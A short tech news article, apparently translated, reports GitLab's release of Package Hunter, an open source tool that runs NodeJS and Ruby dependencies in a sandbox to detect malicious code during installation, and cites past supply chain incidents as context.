Home » Technology » GitLab launches open source tool for detecting malicious code in dependencies – IT Pro – News

GitLab launches open source tool for detecting malicious code in dependencies – IT Pro – News

GitLab has released Package Hunter, a tool that must discover malicious code in dependencies, or third-party libraries that developers add to their own code, before it can do any harm. The tool is open source and released for free.

Package Hunter installs the dependencies in a sandbox environment and monitors all system calls made by the depedencies during installation. If there is a suspicious call in between, the user will receive a notification, so that he can take action. Currently Package Hunter supports NodeJS modules and Ruby Gems.

GitLab developed Package Hunter partly because it hopes that this will give developers more confidence in using public libraries. It is easy to reuse public libraries and add new functions, but there is a risk that bugs or malicious code will be added to their software via these dependencies.

Research from 2020 shows that open source packages are regularly abused for supply chain attacks. For example, malicious code was added last year to the popular package event stream. Start this year published researcher Alex Birsan how he could use dependencies to penetrate the likes of Apple and Microsoft.

GitLab has been testing Package Hunter since November last year and has now released the tool for free and open source. In this way, GitLab hopes developers will continue to contribute to the project and report bugs. Package Hunter can handle any project added with the GitLab CI template.

Package Hunter

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.